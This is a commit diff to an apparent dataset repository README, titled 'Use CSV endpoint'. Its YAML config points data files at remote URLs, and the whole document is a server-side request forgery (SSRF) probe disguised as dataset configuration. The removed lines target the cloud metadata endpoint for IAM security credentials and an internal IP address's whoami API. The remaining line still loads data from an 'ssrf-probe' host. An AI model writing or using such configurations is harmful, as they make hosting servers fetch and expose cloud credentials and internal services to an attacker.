Use CSV endpoint
Browse files
README.md
CHANGED
|
@@ -4,17 +4,9 @@ dataset_info:
|
|
| 4 |
- name: text
|
| 5 |
dtype: string
|
| 6 |
configs:
|
| 7 |
-
- config_name:
|
| 8 |
data_files:
|
| 9 |
- split: train
|
| 10 |
-
path: "https://FIRSTACCOUNT69-ssrf-probe.hf.space/
|
| 11 |
-
- config_name: metadata
|
| 12 |
-
data_files:
|
| 13 |
-
- split: train
|
| 14 |
-
path: "http://169.254.169.254/latest/meta-data/iam/security-credentials.csv"
|
| 15 |
-
- config_name: internal_api
|
| 16 |
-
data_files:
|
| 17 |
-
- split: train
|
| 18 |
-
path: "http://10.0.249.207/api/whoami-v2.jsonl"
|
| 19 |
---
|
| 20 |
# Test Dataset
|
|
|
|
| 4 |
- name: text
|
| 5 |
dtype: string
|
| 6 |
configs:
|
| 7 |
+
- config_name: default
|
| 8 |
data_files:
|
| 9 |
- split: train
|
| 10 |
+
path: "https://FIRSTACCOUNT69-ssrf-probe.hf.space/data.csv"
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 11 |
---
|
| 12 |
# Test Dataset
|